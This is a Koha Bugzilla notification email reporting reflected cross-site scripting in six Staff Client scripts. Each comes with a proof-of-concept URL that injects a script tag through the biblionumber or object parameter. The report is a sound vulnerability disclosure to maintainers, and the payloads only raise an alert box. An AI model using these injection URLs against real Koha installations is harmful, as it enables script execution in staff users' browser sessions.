[Bug 14568] New: XSS in Staff Client
http://bugs.koha-community.org/bugzilla3/show_bug.cgi?id=14568 Bug ID: 14568 Summary: XSS in Staff Client Change sponsored?: --- Product: Koha Version: master Hardware: All OS: All Status: NEW Severity: normal Priority: P5 - low Component: Staff Client Assignee: koha-bugs@lists.koha-community.org Reporter: larit@student.uef.fi QA Contact: testopia@bugs.koha-community.org CC: gmcharlt@gmail.com Cross site scripting vulnerabilities found in Staff Client detail.pl - param biblionumber cgi-bin/koha/catalogue/detail.pl?biblionumber=1<script type="text/javascript">alert("hello")</script> ISBDdetail.pl - param biblionumber cgi-bin/koha/catalogue/ISBDdetail.pl?biblionumber=1<script type="text/javascript">alert("hello")</script> MARCdetail.pl - param biblionumber cgi-bin/koha/catalogue/MARCdetail.pl?biblionumber=1<script type="text/javascript">alert("hello")</script> moredetail.pl - param biblionumber cgi-bin/koha/catalogue/moredetail.pl?biblionumber=1<script type="text/javascript">alert("hello")</script> request.pl - param biblionumber cgi-bin/koha/reserve/request.pl?biblionumber=1"><script type="text/javascript">alert("hello")</script> viewlog.pl - param object cgi-bin/koha/tools/viewlog.pl?do_it=1&modules=CATALOGUING&action=MODIFY&object=462688<script type="text/javascript">alert("hello")</script> -- You are receiving this mail because: You are watching all bug changes. You are the assignee for the bug.
participants (1)
-
bugzilla-daemon@bugs.koha-community.org